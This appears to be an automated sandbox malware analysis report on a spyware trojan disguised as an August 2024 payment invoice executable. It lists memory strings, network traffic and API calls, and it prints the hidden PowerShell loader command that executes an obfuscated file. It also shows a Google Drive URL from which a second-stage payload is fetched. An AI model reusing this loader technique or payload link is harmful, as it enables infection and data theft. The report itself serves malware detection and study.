            Source: msiexec.exe, 00000004.00000002.4128839595.0000000020256000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4128839595.0000000020247000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4128839595.0000000020287000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
            Source: msiexec.exe, 00000004.00000002.4128839595.0000000020251000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
            Source: powershell.exe, 00000001.00000002.1860973910.00000000060FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000001.00000002.1860973910.00000000060FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000001.00000002.1860973910.00000000060FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: msiexec.exe, 00000004.00000002.4115622500.00000000007EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: msiexec.exe, 00000004.00000002.4128456196.000000001F6B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ItIBdLavxGfZi6rWeX-K_CF9nDPwNWT3
            Source: msiexec.exe, 00000004.00000002.4115622500.00000000007EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ItIBdLavxGfZi6rWeX-K_CF9nDPwNWT3(
            Source: msiexec.exe, 00000004.00000002.4115622500.00000000007EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ItIBdLavxGfZi6rWeX-K_CF9nDPwNWT3t
            Source: msiexec.exe, 00000004.00000002.4115622500.0000000000876000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.1969721891.0000000000876000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: msiexec.exe, 00000004.00000002.4115622500.000000000082E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.1925140710.0000000000876000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.1923872826.0000000000876000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1ItIBdLavxGfZi6rWeX-K_CF9nDPwNWT3&export=download
            Source: powershell.exe, 00000001.00000002.1858126944.00000000051E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000001.00000002.1860973910.00000000060FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: msiexec.exe, 00000004.00000002.4128839595.00000000200E0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4128839595.0000000020178000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4128839595.0000000020150000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: msiexec.exe, 00000004.00000002.4128839595.00000000200E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: msiexec.exe, 00000004.00000002.4128839595.0000000020150000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.186
            Source: msiexec.exe, 00000004.00000002.4128839595.000000002010B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4128839595.0000000020178000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4128839595.0000000020150000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.186$
            Source: msiexec.exe, 00000004.00000003.1925140710.0000000000876000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.1923872826.0000000000876000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: msiexec.exe, 00000004.00000002.4128839595.000000002019D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.0000000021361000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.0000000021313000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.00000000211BD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.000000002116F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.0000000021436000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.00000000211E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: msiexec.exe, 00000004.00000002.4129881517.00000000212EE000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.00000000211BF000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.0000000021319000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.0000000021412000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.000000002114A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.0000000021175000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
            Source: msiexec.exe, 00000004.00000002.4128839595.000000002019D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.0000000021361000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.0000000021313000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.00000000211BD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.000000002116F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.0000000021436000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.00000000211E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: msiexec.exe, 00000004.00000002.4129881517.00000000212EE000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.00000000211BF000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.0000000021319000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.0000000021412000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.000000002114A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4129881517.0000000021175000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
            Source: msiexec.exe, 00000004.00000003.1925140710.0000000000876000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.1923872826.0000000000876000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: msiexec.exe, 00000004.00000003.1925140710.0000000000876000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.1923872826.0000000000876000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: msiexec.exe, 00000004.00000003.1925140710.0000000000876000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.1923872826.0000000000876000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: msiexec.exe, 00000004.00000003.1925140710.0000000000876000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.1923872826.0000000000876000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: msiexec.exe, 00000004.00000002.4128839595.0000000020287000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
            Source: msiexec.exe, 00000004.00000002.4128839595.0000000020282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
            Source: unknownNetwork traffic detected: HTTP traffic on port 62511 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62514
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62516
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62518
            Source: unknownNetwork traffic detected: HTTP traffic on port 62526 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62509 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62524 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62511
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62512
            Source: unknownNetwork traffic detected: HTTP traffic on port 62520 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62514 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62522 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62516 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62518 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 62512 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62524
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62526
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62527
            Source: unknownNetwork traffic detected: HTTP traffic on port 62508 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62508
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62509
            Source: unknownNetwork traffic detected: HTTP traffic on port 62527 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62520
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62522
            Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:62508 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 216.58.206.33:443 -> 192.168.2.4:62509 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:62527 version: TLS 1.2
            Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exeCode function: 0_2_00405086 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405086

            System Summary

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Svarbrevets\PAGO FRAS. AGOSTO 2024..exeJump to dropped file
            Source: C:\Windows\SysWOW64\msiexec.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exeCode function: 0_2_0040310F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040310F
            Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exeCode function: 0_2_004048C50_2_004048C5
            Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exeCode function: 0_2_004064CB0_2_004064CB
            Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exeCode function: 0_2_00406CA20_2_00406CA2
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_001FC1464_2_001FC146
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_001FD2784_2_001FD278
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_001F53624_2_001F5362
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_001FC4684_2_001FC468
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_001FC7384_2_001FC738
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_001FE9884_2_001FE988
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_001FCA084_2_001FCA08
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_001FCCD84_2_001FCCD8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_001FCFAA4_2_001FCFAA
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_001F71184_2_001F7118
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_001FE97A4_2_001FE97A
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_001FF9614_2_001FF961
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_001F29E04_2_001F29E0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_001F9DE04_2_001F9DE0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_2283B7A84_2_2283B7A8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_22838FB04_2_22838FB0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_228381D04_2_228381D0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_22837B784_2_22837B78
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_228364884_2_22836488
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_228304984_2_22830498
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_22831E984_2_22831E98
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_2283E0A74_2_2283E0A7
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_22831EA84_2_22831EA8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_228338A84_2_228338A8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_2283C0B74_2_2283C0B7
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_228338B84_2_228338B8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_2283E0B84_2_2283E0B8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_228372B84_2_228372B8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_22834EC04_2_22834EC0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_228372C84_2_228372C8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_2283C0C84_2_2283C0C8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_22834ED04_2_22834ED0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_228308E04_2_228308E0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_2283F2E74_2_2283F2E7
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_228308F04_2_228308F0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_228322F04_2_228322F0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_2283D2F74_2_2283D2F7
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_2283F2F84_2_2283F2F8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_228300074_2_22830007
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_22836A074_2_22836A07
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_228330084_2_22833008
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_228346104_2_22834610
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_2283DC194_2_2283DC19
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_22836A184_2_22836A18
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_2283FC184_2_2283FC18
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_228360224_2_22836022
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_228346204_2_22834620
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_2283BC2B4_2_2283BC2B
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_2283DC284_2_2283DC28
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_228360304_2_22836030
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_2283BC384_2_2283BC38
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_22831A414_2_22831A41
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_228300404_2_22830040
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_22831A504_2_22831A50
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_2283EE574_2_2283EE57
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_2283345F4_2_2283345F
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_228334604_2_22833460
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_2283CE674_2_2283CE67
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_2283EE684_2_2283EE68
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_22836E724_2_22836E72
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_22836E704_2_22836E70
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_22834A784_2_22834A78
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_2283CE784_2_2283CE78
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_228357804_2_22835780
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_2283D7874_2_2283D787
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_2283F7884_2_2283F788
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_2283D7984_2_2283D798
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_2283B7984_2_2283B798
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_22838FA14_2_22838FA1
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_228311A04_2_228311A0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_22832BAF4_2_22832BAF
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_22832BB04_2_22832BB0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_2283E9C84_2_2283E9C8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_22835BD84_2_22835BD8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_2283E9D84_2_2283E9D8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_2283C9D84_2_2283C9D8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_2283C9E84_2_2283C9E8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_228315E84_2_228315E8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_22832FF94_2_22832FF9
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_228315F84_2_228315F8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_228323004_2_22832300
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_2283B3074_2_2283B307
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_2283D3084_2_2283D308
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_2283531A4_2_2283531A
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_2283B3184_2_2283B318
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_228377224_2_22837722
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_228377204_2_22837720
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_228353284_2_22835328
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_2283A9284_2_2283A928
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_2283A9384_2_2283A938
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_2283E5384_2_2283E538
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_228327494_2_22832749
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_22830D484_2_22830D48
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_2283E5484_2_2283E548
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_2283C5484_2_2283C548
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_228327584_2_22832758
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_2283C5584_2_2283C558
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_228357704_2_22835770
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_22837B774_2_22837B77
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_2283F7784_2_2283F778
            Source: PAGO FRAS. AGOSTO 2024..exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/14@5/5
            Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exeCode function: 0_2_0040310F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040310F
            Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exeCode function: 0_2_00404352 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404352
            Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exeCode function: 0_2_0040205E CoCreateInstance,MultiByteToWideChar,0_2_0040205E
            Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exeFile created: C:\Users\user\AppData\Roaming\underarmsmusklensJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7440:120:WilError_03
            Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exeFile created: C:\Users\user\AppData\Local\Temp\nss344C.tmpJump to behavior
            Source: PAGO FRAS. AGOSTO 2024..exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
            Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: PAGO FRAS. AGOSTO 2024..exeVirustotal: Detection: 20%
            Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exeFile read: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe "C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exe"
            Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Laseredes=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Vandrerlav.syn';$Overrislingerne=$Laseredes.SubString(15504,3);.$Overrislingerne($Laseredes)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
            Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Laseredes=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Vandrerlav.syn';$Overrislingerne=$Laseredes.SubString(15504,3);.$Overrislingerne($Laseredes)"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
            Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
